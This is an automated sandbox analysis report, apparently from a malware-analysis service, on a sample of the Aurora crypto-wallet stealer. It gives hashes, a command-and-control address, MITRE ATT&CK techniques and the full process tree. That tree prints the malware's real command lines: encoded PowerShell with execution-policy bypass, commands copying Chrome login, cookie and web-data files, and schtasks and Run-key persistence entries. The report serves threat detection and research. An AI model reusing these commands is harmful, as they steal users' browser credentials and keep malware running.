aurora | 50ed2d8e8d8d0509b7eb41eb7dd0b510b1d74d0fd283eccca2764a79c4e55493

Analysis

max time kernel
20s
max time network
156s
platform
windows10-1703_x64
resource
win10-20230220-en
resource tags

arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system
submitted
12-04-2023 13:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

50ed2d8e8d8d0509b7eb41eb7dd0b510b1d74d0fd283eccca2764a79c4e55493.exe
Size

1.9MB
MD5

3df74698e0964dc8c5363d39a0537d74
SHA1

070eb983cff0a83c77c3da4ff133ca37c0ade304
SHA256

50ed2d8e8d8d0509b7eb41eb7dd0b510b1d74d0fd283eccca2764a79c4e55493
SHA512

987b0c3a71b2e204a7d13b9472db00140e8789b739e1460df2c2ff2f449a958786677ab86452d1ec55a4dfa83ccfac10ee6586f6523670474eee41b9c9590719
SSDEEP

24576:zRw6q5NMwgARkS7B+zz2xt+RvVwrnPdaJTCR+g5ad7x9E67K29r83BnyixLygaBu:Bq5NMMD48ngd7x9Bsn2HBDnC

Score

10^/10

aurora persistence stealer

Malware Config

Extracted

Family

aurora

104.248.91.138:8081

Signatures

Aurora
Aurora is a crypto wallet stealer written in Golang.
stealer aurora
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

1 3928 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 4 IoCs

Processes:

Pyftpsushffsruhxwfdkstart.exesvchost.exesyshost.execalc.exe

pid process

5008 Pyftpsushffsruhxwfdkstart.exe
808 svchost.exe
3444 syshost.exe
3364 calc.exe

flow	pid	process
1	3928	powershell.exe

pid	process
5008	Pyftpsushffsruhxwfdkstart.exe
808	svchost.exe
3444	syshost.exe
3364	calc.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

svchost.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Windows\CurrentVersion\Run\runtime_1 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\config\\runtime.exe"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Windows\CurrentVersion\Run\runtime_2 = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\config\\runtime.exe"	svchost.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

50ed2d8e8d8d0509b7eb41eb7dd0b510b1d74d0fd283eccca2764a79c4e55493.exe

description	pid	process	target process
PID 4220 set thread context of 2104	4220	50ed2d8e8d8d0509b7eb41eb7dd0b510b1d74d0fd283eccca2764a79c4e55493.exe	RegAsm.exe

Drops file in Windows directory 3 IoCs

Processes:

powershell.exe

description	ioc	process
File created	C:\Windows\System\svchost.exe	powershell.exe
File created	C:\Windows\System\syshost.exe	powershell.exe
File created	C:\Windows\System\calc.exe	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

2216 schtasks.exe
1764 schtasks.exe
4036 schtasks.exe
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exe

pid process

4260 systeminfo.exe
Modifies registry class 1 IoCs

Processes:

calc.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings calc.exe

pid	process
2216	schtasks.exe
1764	schtasks.exe
4036	schtasks.exe

pid	process
4260	systeminfo.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings	calc.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

Processes:

50ed2d8e8d8d0509b7eb41eb7dd0b510b1d74d0fd283eccca2764a79c4e55493.exepowershell.exepowershell.exepowershell.exe

pid	process
4220	50ed2d8e8d8d0509b7eb41eb7dd0b510b1d74d0fd283eccca2764a79c4e55493.exe
4220	50ed2d8e8d8d0509b7eb41eb7dd0b510b1d74d0fd283eccca2764a79c4e55493.exe
4220	50ed2d8e8d8d0509b7eb41eb7dd0b510b1d74d0fd283eccca2764a79c4e55493.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
4900	powershell.exe
4900	powershell.exe
4900	powershell.exe
1900	powershell.exe
1900	powershell.exe
1900	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

50ed2d8e8d8d0509b7eb41eb7dd0b510b1d74d0fd283eccca2764a79c4e55493.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4220	50ed2d8e8d8d0509b7eb41eb7dd0b510b1d74d0fd283eccca2764a79c4e55493.exe
Token: SeDebugPrivilege	3928	powershell.exe
Token: SeDebugPrivilege	4900	powershell.exe
Token: SeIncreaseQuotaPrivilege	3928	powershell.exe
Token: SeSecurityPrivilege	3928	powershell.exe
Token: SeTakeOwnershipPrivilege	3928	powershell.exe
Token: SeLoadDriverPrivilege	3928	powershell.exe
Token: SeSystemProfilePrivilege	3928	powershell.exe
Token: SeSystemtimePrivilege	3928	powershell.exe
Token: SeProfSingleProcessPrivilege	3928	powershell.exe
Token: SeIncBasePriorityPrivilege	3928	powershell.exe
Token: SeCreatePagefilePrivilege	3928	powershell.exe
Token: SeBackupPrivilege	3928	powershell.exe
Token: SeRestorePrivilege	3928	powershell.exe
Token: SeShutdownPrivilege	3928	powershell.exe
Token: SeDebugPrivilege	3928	powershell.exe
Token: SeSystemEnvironmentPrivilege	3928	powershell.exe
Token: SeRemoteShutdownPrivilege	3928	powershell.exe
Token: SeUndockPrivilege	3928	powershell.exe
Token: SeManageVolumePrivilege	3928	powershell.exe
Token: 33	3928	powershell.exe
Token: 34	3928	powershell.exe
Token: 35	3928	powershell.exe
Token: 36	3928	powershell.exe
Token: SeIncreaseQuotaPrivilege	3928	powershell.exe
Token: SeSecurityPrivilege	3928	powershell.exe
Token: SeTakeOwnershipPrivilege	3928	powershell.exe
Token: SeLoadDriverPrivilege	3928	powershell.exe
Token: SeSystemProfilePrivilege	3928	powershell.exe
Token: SeSystemtimePrivilege	3928	powershell.exe
Token: SeProfSingleProcessPrivilege	3928	powershell.exe
Token: SeIncBasePriorityPrivilege	3928	powershell.exe
Token: SeCreatePagefilePrivilege	3928	powershell.exe
Token: SeBackupPrivilege	3928	powershell.exe
Token: SeRestorePrivilege	3928	powershell.exe
Token: SeShutdownPrivilege	3928	powershell.exe
Token: SeDebugPrivilege	3928	powershell.exe
Token: SeSystemEnvironmentPrivilege	3928	powershell.exe
Token: SeRemoteShutdownPrivilege	3928	powershell.exe
Token: SeUndockPrivilege	3928	powershell.exe
Token: SeManageVolumePrivilege	3928	powershell.exe
Token: 33	3928	powershell.exe
Token: 34	3928	powershell.exe
Token: 35	3928	powershell.exe
Token: 36	3928	powershell.exe
Token: SeIncreaseQuotaPrivilege	3928	powershell.exe
Token: SeSecurityPrivilege	3928	powershell.exe
Token: SeTakeOwnershipPrivilege	3928	powershell.exe
Token: SeLoadDriverPrivilege	3928	powershell.exe
Token: SeSystemProfilePrivilege	3928	powershell.exe
Token: SeSystemtimePrivilege	3928	powershell.exe
Token: SeProfSingleProcessPrivilege	3928	powershell.exe
Token: SeIncBasePriorityPrivilege	3928	powershell.exe
Token: SeCreatePagefilePrivilege	3928	powershell.exe
Token: SeBackupPrivilege	3928	powershell.exe
Token: SeRestorePrivilege	3928	powershell.exe
Token: SeShutdownPrivilege	3928	powershell.exe
Token: SeDebugPrivilege	3928	powershell.exe
Token: SeSystemEnvironmentPrivilege	3928	powershell.exe
Token: SeRemoteShutdownPrivilege	3928	powershell.exe
Token: SeUndockPrivilege	3928	powershell.exe
Token: SeManageVolumePrivilege	3928	powershell.exe
Token: 33	3928	powershell.exe
Token: 34	3928	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

OpenWith.exe

pid process

1064 OpenWith.exe

pid	process
1064	OpenWith.exe

Suspicious use of WriteProcessMemory 28 IoCs

Processes:

50ed2d8e8d8d0509b7eb41eb7dd0b510b1d74d0fd283eccca2764a79c4e55493.exePyftpsushffsruhxwfdkstart.exeRegAsm.exepowershell.exesvchost.exepowershell.exe

description	pid	process	target process
PID 4220 wrote to memory of 5008	4220	50ed2d8e8d8d0509b7eb41eb7dd0b510b1d74d0fd283eccca2764a79c4e55493.exe	Pyftpsushffsruhxwfdkstart.exe
PID 4220 wrote to memory of 5008	4220	50ed2d8e8d8d0509b7eb41eb7dd0b510b1d74d0fd283eccca2764a79c4e55493.exe	Pyftpsushffsruhxwfdkstart.exe
PID 4220 wrote to memory of 2124	4220	50ed2d8e8d8d0509b7eb41eb7dd0b510b1d74d0fd283eccca2764a79c4e55493.exe	RegAsm.exe
PID 4220 wrote to memory of 2124	4220	50ed2d8e8d8d0509b7eb41eb7dd0b510b1d74d0fd283eccca2764a79c4e55493.exe	RegAsm.exe
PID 4220 wrote to memory of 2124	4220	50ed2d8e8d8d0509b7eb41eb7dd0b510b1d74d0fd283eccca2764a79c4e55493.exe	RegAsm.exe
PID 4220 wrote to memory of 2104	4220	50ed2d8e8d8d0509b7eb41eb7dd0b510b1d74d0fd283eccca2764a79c4e55493.exe	RegAsm.exe
PID 4220 wrote to memory of 2104	4220	50ed2d8e8d8d0509b7eb41eb7dd0b510b1d74d0fd283eccca2764a79c4e55493.exe	RegAsm.exe
PID 4220 wrote to memory of 2104	4220	50ed2d8e8d8d0509b7eb41eb7dd0b510b1d74d0fd283eccca2764a79c4e55493.exe	RegAsm.exe
PID 4220 wrote to memory of 2104	4220	50ed2d8e8d8d0509b7eb41eb7dd0b510b1d74d0fd283eccca2764a79c4e55493.exe	RegAsm.exe
PID 4220 wrote to memory of 2104	4220	50ed2d8e8d8d0509b7eb41eb7dd0b510b1d74d0fd283eccca2764a79c4e55493.exe	RegAsm.exe
PID 4220 wrote to memory of 2104	4220	50ed2d8e8d8d0509b7eb41eb7dd0b510b1d74d0fd283eccca2764a79c4e55493.exe	RegAsm.exe
PID 4220 wrote to memory of 2104	4220	50ed2d8e8d8d0509b7eb41eb7dd0b510b1d74d0fd283eccca2764a79c4e55493.exe	RegAsm.exe
PID 4220 wrote to memory of 2104	4220	50ed2d8e8d8d0509b7eb41eb7dd0b510b1d74d0fd283eccca2764a79c4e55493.exe	RegAsm.exe
PID 5008 wrote to memory of 3928	5008	Pyftpsushffsruhxwfdkstart.exe	powershell.exe
PID 5008 wrote to memory of 3928	5008	Pyftpsushffsruhxwfdkstart.exe	powershell.exe
PID 2104 wrote to memory of 4900	2104	RegAsm.exe	powershell.exe
PID 2104 wrote to memory of 4900	2104	RegAsm.exe	powershell.exe
PID 2104 wrote to memory of 4900	2104	RegAsm.exe	powershell.exe
PID 3928 wrote to memory of 3444	3928	powershell.exe	syshost.exe
PID 3928 wrote to memory of 3444	3928	powershell.exe	syshost.exe
PID 3928 wrote to memory of 3364	3928	powershell.exe	calc.exe
PID 3928 wrote to memory of 3364	3928	powershell.exe	calc.exe
PID 808 wrote to memory of 1900	808	svchost.exe	powershell.exe
PID 808 wrote to memory of 1900	808	svchost.exe	powershell.exe
PID 1900 wrote to memory of 2216	1900	powershell.exe	schtasks.exe
PID 1900 wrote to memory of 2216	1900	powershell.exe	schtasks.exe
PID 808 wrote to memory of 1352	808	svchost.exe	powershell.exe
PID 808 wrote to memory of 1352	808	svchost.exe	powershell.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\50ed2d8e8d8d0509b7eb41eb7dd0b510b1d74d0fd283eccca2764a79c4e55493.exe
"C:\Users\Admin\AppData\Local\Temp\50ed2d8e8d8d0509b7eb41eb7dd0b510b1d74d0fd283eccca2764a79c4e55493.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4220

C:\Users\Admin\AppData\Local\Temp\Pyftpsushffsruhxwfdkstart.exe
"C:\Users\Admin\AppData\Local\Temp\Pyftpsushffsruhxwfdkstart.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5008

C:\Windows\system32\windowspowershell\v1.0\powershell.exe
"C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwA5AGQAYwA2AGQAYwAwADEALQBmADAAZQBkAC0ANAA2ADAAMQAtAGEANgBhADEALQBjADgAZgBjAGEAOQA0ADIAMgAzADMAMAAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAFAAeQBmAHQAcABzAHUAcwBoAGYAZgBzAHIAdQBoAHgAdwBmAGQAawBzAHQAYQByAHQALgBlAHgAZQAnADsAdAByAHkAIAB7AA0ACgAgACAAJABuAHUAbABsACAAPQAgAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkAEYAaQBsAGUAKAAkAHkAKQAgAA0ACgAgACAALgAgACgAWwBfADMAMgAuAF8AOAA4AF0AOgA6AF8ANwA0ACgAJAB4ACkAKQANAAoAIAAgAGUAeABpAHQAIAAkAEwAQQBTAFQARQBYAEkAVABDAE8ARABFAA0ACgB9ACAADQAKAGMAYQB0AGMAaAAgAFsATgBvAHQAUwB1AHAAcABvAHIAdABlAGQARQB4AGMAZQBwAHQAaQBvAG4AXQANAAoAewANAAoAIAAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnAEEAcABwAGwAaQBjAGEAdABpAG8AbgAgAGwAbwBjAGEAdABpAG8AbgAgAGkAcwAgAHUAbgB0AHIAdQBzAHQAZQBkAC4AIABDAG8AcAB5ACAAZgBpAGwAZQAgAHQAbwAgAGEAIABsAG8AYwBhAGwAIABkAHIAaQB2AGUALAAgAGEAbgBkACAAdAByAHkAIABhAGcAYQBpAG4ALgAnACAALQBGAG8AcgBlAGcAcgBvAHUAbgBkAEMAbwBsAG8AcgAgAFIAZQBkAA0ACgB9AA0ACgBjAGEAdABjAGgAIAANAAoAewANAAoAIAAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAoACIARQByAHIAbwByADoAIAAiACAAKwAgACQAXwAuAEUAeABjAGUAcAB0AGkAbwBuAC4ATQBlAHMAcwBhAGcAZQApACAALQBGAG8AcgBlACAAUgBlAGQAIAANAAoAfQA=
3⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3928

C:\Windows\System\syshost.exe
"C:\Windows\System\syshost.exe"
4⤵
- Executes dropped EXE
PID:3444

C:\Windows\system32\cmd.exe
cmd.exe /c "wmic csproduct get uuid"
5⤵
PID:3700

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
6⤵
PID:4556

C:\Windows\System32\Wbem\wmic.exe
wmic os get Caption
5⤵
PID:1436

C:\Windows\system32\cmd.exe
cmd /C "wmic path win32_VideoController get name"
5⤵
PID:3568

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
6⤵
PID:3808

C:\Windows\system32\cmd.exe
cmd /C "wmic cpu get name"
5⤵
PID:4524

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get name
6⤵
PID:3224

C:\Windows\system32\cmd.exe
cmd "/c " systeminfo
5⤵
PID:3548

C:\Windows\system32\systeminfo.exe
systeminfo
6⤵
- Gathers system information
PID:4260

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "" "copy \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\History\" \"C:\Users\Admin\AppData\Local\Temp\XVlBzgbaiC\""
5⤵
PID:4352

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "" "copy \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State\" \"C:\Users\Admin\AppData\Local\Temp\MRAjWwhTHctcuAx\""
5⤵
PID:4752

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "" "copy \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data\" \"C:\Users\Admin\AppData\Local\Temp\hxKQFDaFpL\""
5⤵
PID:420

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "" "copy \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State\" \"C:\Users\Admin\AppData\Local\Temp\SjFbcXoEFfRsWxP\""
5⤵
PID:1348

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "" "copy \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies\" \"C:\Users\Admin\AppData\Local\Temp\LDnJObCsNV\""
5⤵
PID:2272

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "" "copy \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State\" \"C:\Users\Admin\AppData\Local\Temp\lgTeMaPEZQleQYh\""
5⤵
PID:3800

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "" "copy \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Data\" \"C:\Users\Admin\AppData\Local\Temp\YzRyWJjPjz\""
5⤵
PID:2196

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "" "copy \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State\" \"C:\Users\Admin\AppData\Local\Temp\pfRFEgmotaFetHs\""
5⤵
PID:2112

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "" "copy \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State\" \"C:\Users\Admin\AppData\Local\Temp\bZRjxAwnwe\""
5⤵
PID:1168

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "" "copy \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State\" \"C:\Users\Admin\AppData\Local\Temp\krBEmfdzdcEkXBA\""
5⤵
PID:4212

C:\Windows\System\calc.exe
"C:\Windows\System\calc.exe"
4⤵
- Executes dropped EXE
- Modifies registry class
PID:3364

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
2⤵
PID:2124

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:2104

C:\Windows\SysWOW64\windowspowershell\v1.0\powershell.exe
"C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwA4ADYAMAAyAGYANQBmADAALQAwADcAMgA0AC0ANABkADUAYQAtAGEAMAAxAGMALQA4ADAAZgBmAGQAOQBiADEAYgBhADIAYQAnADsAJAB5AD0AJwBDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrAFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAFIAZQBnAEEAcwBtAC4AZQB4AGUAJwA7AHQAcgB5ACAAewANAAoAIAAgACQAbgB1AGwAbAAgAD0AIABbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABGAGkAbABlACgAJAB5ACkAIAANAAoAIAAgAC4AIAAoAFsAXwAzADIALgBfADgAOABdADoAOgBfADcANAAoACQAeAApACkADQAKACAAIABlAHgAaQB0ACAAJABMAEEAUwBUAEUAWABJAFQAQwBPAEQARQANAAoAfQAgAA0ACgBjAGEAdABjAGgAIABbAE4AbwB0AFMAdQBwAHAAbwByAHQAZQBkAEUAeABjAGUAcAB0AGkAbwBuAF0ADQAKAHsADQAKACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAJwBBAHAAcABsAGkAYwBhAHQAaQBvAG4AIABsAG8AYwBhAHQAaQBvAG4AIABpAHMAIAB1AG4AdAByAHUAcwB0AGUAZAAuACAAQwBvAHAAeQAgAGYAaQBsAGUAIAB0AG8AIABhACAAbABvAGMAYQBsACAAZAByAGkAdgBlACwAIABhAG4AZAAgAHQAcgB5ACAAYQBnAGEAaQBuAC4AJwAgAC0ARgBvAHIAZQBnAHIAbwB1AG4AZABDAG8AbABvAHIAIABSAGUAZAANAAoAfQANAAoAYwBhAHQAYwBoACAADQAKAHsADQAKACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAKAAiAEUAcgByAG8AcgA6ACAAIgAgACsAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAKQAgAC0ARgBvAHIAZQAgAFIAZQBkACAADQAKAH0A
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4900

C:\Windows\System\svchost.exe
C:\Windows\System\svchost.exe
1⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:808

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "" "SCHTASKS.exe /Create /SC MINUTE /ED 12/12/2030 /TN runtime_1 /TR C:\Users\Admin\AppData\Roaming\Microsoft\config\runtime.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1900

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /ED 12/12/2030 /TN runtime_1 /TR C:\Users\Admin\AppData\Roaming\Microsoft\config\runtime.exe
3⤵
- Creates scheduled task(s)
PID:2216

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "" "SCHTASKS.exe /Create /SC MINUTE /ED 12/12/2030 /TN runtime_2 /TR C:\Users\Admin\AppData\Local\Microsoft\config\runtime.exe"
2⤵
PID:1352

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /ED 12/12/2030 /TN runtime_2 /TR C:\Users\Admin\AppData\Local\Microsoft\config\runtime.exe
3⤵
- Creates scheduled task(s)
PID:1764

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "" "SCHTASKS.exe /Create /SC MINUTE /ED 12/12/2030 /TN runtime_3 /TR C:\Users\Admin\AppData\Local\Temp\Microsoft\config\runtime.exe"
2⤵
PID:4140

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /ED 12/12/2030 /TN runtime_3 /TR C:\Users\Admin\AppData\Local\Temp\Microsoft\config\runtime.exe
3⤵
- Creates scheduled task(s)
PID:4036

C:\Windows\system32\cmd.exe
cmd.exe /c "wmic csproduct get uuid"
2⤵
PID:1848

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
3⤵
PID:3668

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:1064

C:\Users\Admin\AppData\Local\Microsoft\config\runtime.exe
C:\Users\Admin\AppData\Local\Microsoft\config\runtime.exe
1⤵
PID:4504

C:\Windows\system32\cmd.exe
cmd.exe /c "wmic csproduct get uuid"
2⤵
PID:4904

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
3⤵
PID:3220

C:\Users\Admin\AppData\Roaming\Microsoft\config\runtime.exe
C:\Users\Admin\AppData\Roaming\Microsoft\config\runtime.exe
1⤵
PID:2076

C:\Windows\system32\cmd.exe
cmd.exe /c "wmic csproduct get uuid"
2⤵
PID:3976

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
3⤵
PID:3232

C:\Users\Admin\AppData\Local\Temp\Microsoft\config\runtime.exe
C:\Users\Admin\AppData\Local\Temp\Microsoft\config\runtime.exe
1⤵
PID:2548

C:\Windows\system32\cmd.exe
cmd.exe /c "wmic csproduct get uuid"
2⤵
PID:4512

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
3⤵
PID:4104

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
865c03396c2e3e3afcbffe950597b91a

SHA1
d015356f1f6557dc9169bda9230aa6c3c91d96de

SHA256
9a967b63e56aa27b3cdcb815e18943e9c20f2f57b8ca989d9fe6a25b02dcab26

SHA512
10e6d18ad81d24ee95a651894e0a123a3396f6900972b0edca21dfa325d3e6bd0cbc53f7569c275c268ec6fe9fc248f76a764109ed719d1320cd0eed4ee57c4b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
11e7b62edd9604a1e4f27427ccc7eca3

SHA1
76ed291bb5d36eef8952862a83cfb2fe6ccb6e1e

SHA256
31917b27acb90dee2111f2176b7da0d6758e06fc0a5658f2fb5da386e6d2125a

SHA512
18a4b527d24e0bbf7505cbadd6c3faa0ac26aa0e092cb50f1b007fdd8a6586f01b094badacfc891b5fd15d64e45b210b9b61864e3952ea5cc1cf51f83693bee7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
11e7b62edd9604a1e4f27427ccc7eca3

SHA1
76ed291bb5d36eef8952862a83cfb2fe6ccb6e1e

SHA256
31917b27acb90dee2111f2176b7da0d6758e06fc0a5658f2fb5da386e6d2125a

SHA512
18a4b527d24e0bbf7505cbadd6c3faa0ac26aa0e092cb50f1b007fdd8a6586f01b094badacfc891b5fd15d64e45b210b9b61864e3952ea5cc1cf51f83693bee7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
7a5012ccafa7de42c90d490ff1fbf5d3

SHA1
ea81a011a663da3c5753695da2c866d58a36b2d0

SHA256
bfe6fc1a1ba1ddc2016b4a9749af323a1e740572d3287626939b55b053a47e8f

SHA512
60521fdb55667739109c2063ab2482f54dc28df50c078d56adddc055328cf60a102e51c7554ea4253fee3dd96d333fd1d184379daadd5f5f3670baff899512a8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
0d08d1cc2f8d6d2c5cd567d96f9b4663

SHA1
49f7f739f7f39b63089dea2a873bea36ddcafe37

SHA256
2bb3b8994294a38b11fc55f6e46f30c741a956361cd00a242ee9ab6aa40f6b73

SHA512
a72eaf54ec1f4fc189bc1253bfd1c7af6748784ae50343a87d7ef57f1f8666b42cb461159f2f3e47ae705340efd9995493dc4ea9ebf931a88dac65ef3ded32ae

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
fc3f1780a81e41ba91e08f8d704c5ffe

SHA1
99dafd104c6174424d5fac145187aadeafb0d794

SHA256
978b18bdf57f48cfee608cc5218248cbf885e30afa18cf57f7baa16f352d2890

SHA512
7ec387c1fb72c53877f2e705796c2fb007ffa3766a98bde29c60f146b83bfc4d8dc329e5c0166cc45297343142b6be4eb2674b212f7285fd4eaa322f75c82683

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
5e06f0d64e59763ef464ffe2d725c32c

SHA1
27a2e380b332cafa2e0d219d2e5a913b2d61a970

SHA256
025bc605000366f90a21997c1bdd01f146b3381f33e94f72bee3935fa9ecef97

SHA512
032a0718fde2b74d65dbecbb06b16f44490e3f4fe241b5ff19c031c2580ce0486cfc193aa0314269141172a26de27f7d88e756c20734d5cb70f696e29f457a13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
7ee1d37678577f2252a5bbbb34d2528a

SHA1
720912a59c8f3656f2c029e18e99163509abe07b

SHA256
a2ca1dab30886f534bdbb7c64a6dbb592af5932cac106ac1792c38e6e512b396

SHA512
18986f6100e0f42d9f47f8be3587c3c89f0da07e4d545d7f108206efb99387972757c006722a4c02cf6fdbbb3fe00d21393657d4383c01ac5f7d9e53236a449b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
94da4d4b1850e076de38217340c8d825

SHA1
47a6366e76250402b6483fd99d16bc5fbb63fdc8

SHA256
1d767302338645fe1e7ecb126bbb9f6d2f7ced5831a41e96f906203cf552a0ac

SHA512
19bedc1bf0865a3a3fd79523189a2d3cc4b82008b06d6c6cee1c6af01bdd2c4528a344c91e4be703247363aa4cfc303e96f15bd99a26b1e77fdef41920089247

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

